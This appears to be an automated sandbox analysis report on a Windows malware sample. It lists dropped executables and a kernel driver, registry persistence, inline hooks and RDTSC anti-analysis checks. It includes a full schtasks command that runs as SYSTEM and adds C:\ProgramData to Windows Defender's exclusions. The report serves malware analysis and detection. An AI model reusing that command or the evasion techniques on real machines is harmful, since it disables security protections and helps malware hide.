Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: acppage.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: aepic.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: tbcore3u.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: sxs.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: devenum.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: winmm.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: tbcore3u.dll
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
Source: 2b687482300.6345827638.08.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 2b687482300.6345827638.08.exeStatic file information: File size 30883840 > 1048576
Source: 2b687482300.6345827638.08.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200
Source: 2b687482300.6345827638.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: G5CQjd.exe, 00000028.00000000.3437121582.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 00000029.00000000.3464191213.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, Cy9OUo.exe, 0000002A.00000000.3469206986.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002D.00000002.3499578790.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002D.00000000.3491990756.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002E.00000000.3579031648.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002E.00000002.3594006751.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, G5CQjd.exe, 0000002F.00000002.3596772792.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 0000002F.00000000.3584367115.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe.6.dr, Cy9OUo.exe.40.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622438995.00000000048DB000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622589579.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622681734.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622615056.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, EMp3o1.exe, 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe, 00000005.00000000.2758749263.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe, 00000006.00000000.2978571160.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe.0.dr
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000
Source: initial sampleStatic PE information: section where entry point is pointing to: .mo:
Source: tbcore3U.dll.6.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.6.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.6.drStatic PE information: section name: .mo:
Source: tbcore3U.dll.40.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.40.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.40.drStatic PE information: section name: .mo:
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 41_2_00712691 push ecx; ret 41_2_007126A4
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeCode function: 42_2_001F2691 push ecx; ret 42_2_001F26A4

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\Documents\EMp3o1.exeJump to dropped file
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\EMp3o1.exeFile created: C:\Program Files (x86)\G5CQjd\tbcore3U.dllJump to dropped file
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeFile created: C:\Program Files (x86)\E2ky7uqb\tbcore3U.dllJump to dropped file
Source: C:\Users\user\Documents\EMp3o1.exeFile created: C:\Program Files (x86)\G5CQjd\G5CQjd.exeJump to dropped file
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeFile created: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeJump to dropped file

Boot Survival

Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeRegistry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\SauronJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Documents\EMp3o1.exeMemory written: PID: 5956 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeMemory written: PID: 5956 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeMemory written: PID: 6032 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeMemory written: PID: 6032 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 4548 base: C90005 value: E9 8B 2F 6F 76 Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 4548 base: 77382F90 value: E9 7A D0 90 89 Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 4548 base: FF0005 value: E9 8B 2F 39 76 Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 4548 base: 77382F90 value: E9 7A D0 C6 89 Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 6888 base: 880005 value: E9 8B 2F B0 76
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 6888 base: 77382F90 value: E9 7A D0 4F 89
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 3660 base: 10E0005 value: E9 8B 2F 2A 76
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 3660 base: 77382F90 value: E9 7A D0 D5 89
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 2496 base: 1180005 value: E9 8B 2F 20 76
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 2496 base: 77382F90 value: E9 7A D0 DF 89
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 5056 base: FD0005 value: E9 8B 2F 3B 76
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 5056 base: 77382F90 value: E9 7A D0 C4 89
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 720 base: D60005 value: E9 8B 2F 62 76
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 720 base: 77382F90 value: E9 7A D0 9D 89
Source: C:\Users\user\Documents\EMp3o1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CA4183C
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C9EF34F
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C96BC04
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CAE82C1
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CA3F839
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CA68647
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CA4C0AF
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CAF6565
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 3B4ED6D
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 3744BC8
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 379E627
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 377336B
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 37D97BB
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 37CA3BD
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 38554DC
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C9C5143
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CAC9F9E
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CABB056
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C26A03F
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C389F9E
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C283E38
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C2AF34F
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C99F12B
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CB091B6
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C396E74
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C3B6565
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C2FF839
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C3D8092
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C371EB4
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C2690FC
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C3B2F48
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C1DDE34
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C268B19
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C27F34F
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C2390FC
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C2887AA
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C341EB4
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C382F48
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C22F12B
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C292089
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeAPI/Special instruction interceptor: Address: 6C1ADE34
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C9C3E38
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6C9A90FC
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeAPI/Special instruction interceptor: Address: 6CAF2F48
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeRDTSC instruction interceptor: First address: 140001113 second address: 14000112A instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeRDTSC instruction interceptor: First address: 14000112A second address: 14000112A instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FF9B8D55D60h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\EMp3o1.exeRDTSC instruction interceptor: First address: 3F1C255 second address: 3F1C263 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exe Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_42-3236
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_41-3230
Source: C:\Users\user\Documents\EMp3o1.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_5-14029
Source: C:\Users\user\Documents\EMp3o1.exe API coverage: 2.7 %
Source: C:\Users\user\Documents\EMp3o1.exe TID: 5840 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Documents\EMp3o1.exe TID: 6628 Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe TID: 2432 Thread sleep time: -40000s >= -30000s
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe TID: 1908 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe TID: 2096 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe TID: 3184 Thread sleep count: 43 > 30
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe TID: 5644 Thread sleep count: 39 > 30
Source: C:\Users\user\Documents\EMp3o1.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_00007FFDAC08A1B8 FindFirstFileExW
Source: C:\Users\user\Documents\EMp3o1.exe Thread delayed: delay time: 60000
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Documents\EMp3o1.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Documents\EMp3o1.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\Documents\EMp3o1.exe File opened: C:\Users\user
Source: C:\Users\user\Documents\EMp3o1.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\Documents\EMp3o1.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Documents\EMp3o1.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: G5CQjd.exe, 00000028.00000003.3779906783.0000000000D58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Documents\EMp3o1.exe API call chain: ExitProcess graph end node graph_5-14030
Source: C:\Users\user\Documents\EMp3o1.exe API call chain: ExitProcess graph end node graph_5-14373
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exe Process information queried: ProcessInformation
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_00000001400073E0 LdrLoadDll
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Code function: 40_3_04DE00CD mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Code function: 40_3_04DE0643 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc
Source: C:\Users\user\Documents\EMp3o1.exe Process token adjusted: Debug
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_00000001400092E0 SetUnhandledExceptionFilter
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_00007FFDAC082630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_00007FFDAC0876E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
